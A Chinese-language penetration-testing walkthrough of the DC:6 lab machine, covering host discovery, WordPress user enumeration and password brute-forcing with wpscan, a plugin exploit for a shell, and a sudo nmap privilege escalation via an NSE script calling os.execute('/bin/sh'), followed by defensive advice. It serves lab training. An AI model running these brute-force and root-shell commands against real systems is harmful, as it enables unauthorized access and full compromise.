DC:6 靶机渗透测试教学文档

一、环境信息

• 攻击机IP: 192.168.44.133
• 靶机IP: 192.168.44.145

二、信息收集阶段

1. 主机发现

使用以下两种方法确定靶机IP:

# 方法1: nmap扫描
nmap -sn 192.168.44.0/24

# 方法2: arp-scan扫描
arp-scan -I eth0 -l

2. 端口扫描

发现80端口开放，但需要通过域名访问:

• 修改hosts文件，添加映射:

192.168.44.145 wordy

3. 目录扫描

发现WordPress特有目录，但无其他有用信息。

三、前期渗透测试

1. WordPress站点分析

• 使用wpscan进行用户枚举和密码爆破:

wpscan --url http://wordy -eu

• 初始爆破失败后，通过线索优化字典:

cat /usr/share/wordlists/rockyou.txt | grep k01 > password
wpscan --url http://wordy -eu -P password

获取凭证: mark/helpdesk01

2. 登录后分析

• 登录WordPress后台
• 检查可用的攻击面:
  • 无直接插入代码的地方
  • 头像上传可能存在白名单过滤
• 发现可利用插件: Activity monitor

3. 漏洞利用

利用Activity monitor插件漏洞获取初始shell，并尝试反弹shell。

四、权限提升

1. 初始提权尝试

• 检查SUID文件，未发现可利用项
• 遍历家目录发现敏感信息，获取新凭证

2. 切换用户

使用发现的凭证切换到jens用户。

3. Sudo提权

检查sudo权限:

sudo -l

发现可以使用nmap以root权限运行，利用nmap 7.4版本的提权方法:

# 创建nmap脚本
echo 'os.execute("/bin/sh")' > nse_root.nse

# 以root权限执行
sudo -u root nmap --script=/home/jens/nse_root.nse

五、关键知识点总结

1. 主机发现技术:

   • nmap和arp-scan的使用
   • 网络扫描的基本方法

2. WordPress渗透:

   • wpscan工具的使用
   • 字典优化技巧(grep过滤)
   • WordPress插件漏洞利用

3. 权限提升技术:

   • 敏感信息查找技巧
   • Sudo权限滥用
   • nmap提权方法(7.4版本)

4. 反弹shell技巧:

   • 获取初始访问后的shell稳定性处理

六、防御建议

1. 针对WordPress:

   • 定期更新WordPress核心和插件
   • 使用强密码策略
   • 限制登录尝试次数

2. 针对系统安全:

   • 定期检查sudo权限配置
   • 更新存在提权漏洞的软件(nmap等)
   • 限制敏感信息的存储位置和权限

3. 针对网络配置:

   • 实施网络分段
   • 监控异常网络活动
   • 定期进行安全审计

本教学文档涵盖了从信息收集到最终提权的完整渗透测试流程，重点突出了关键技术和工具的使用方法。